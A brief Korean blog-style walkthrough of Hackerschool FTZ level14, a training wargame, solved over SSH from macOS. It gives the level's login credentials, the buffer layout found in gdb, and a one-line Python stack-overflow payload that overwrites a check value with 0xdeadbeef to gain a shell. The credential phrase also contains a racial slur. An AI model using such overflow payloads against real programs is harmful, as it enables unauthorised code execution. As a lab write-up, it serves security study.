해커스쿨 ftz level14 (macOS)

해커스쿨 ftz Level14

MacOS에서 푸는 해커스쿨 ftz 

해커스쿨 ftz level14 단계이다.

먼저 ftz서버를 실행한다.

서버 실행을 모르면 ftz trainer1 단계에 소개되어 있다.

 

Mac의 터미널을 열어 서버에 접속합니다.

명령어는 

ssh -c aes128-cbc level14@서버ip

라고 입력합니다.

Id: level14, pw: what that nigga want? 로 로그인을 하고 파일을 확인하였다.

hint 를 확인하니 이번엔 check 값이 0xdeadbeef가 되어야 함을 알 수 있었다.

gdb를 통해 보면 buf 20바이트, dummy 20바이트 후에 check값 4바이트가 나오는 것을 확인하였다.

(python -c 'print "A"*40+"\xef\xbe\xad\xde"'; cat) | ./attackme

라고 40바이트를 아무값이나 채우고 4바이트를 0xdeadbeef로 채워서 입력하여 주니 입력값을 받도록 되었고

my-pass를 입력하니 패스워드가 출력되었다.

 

 

끝.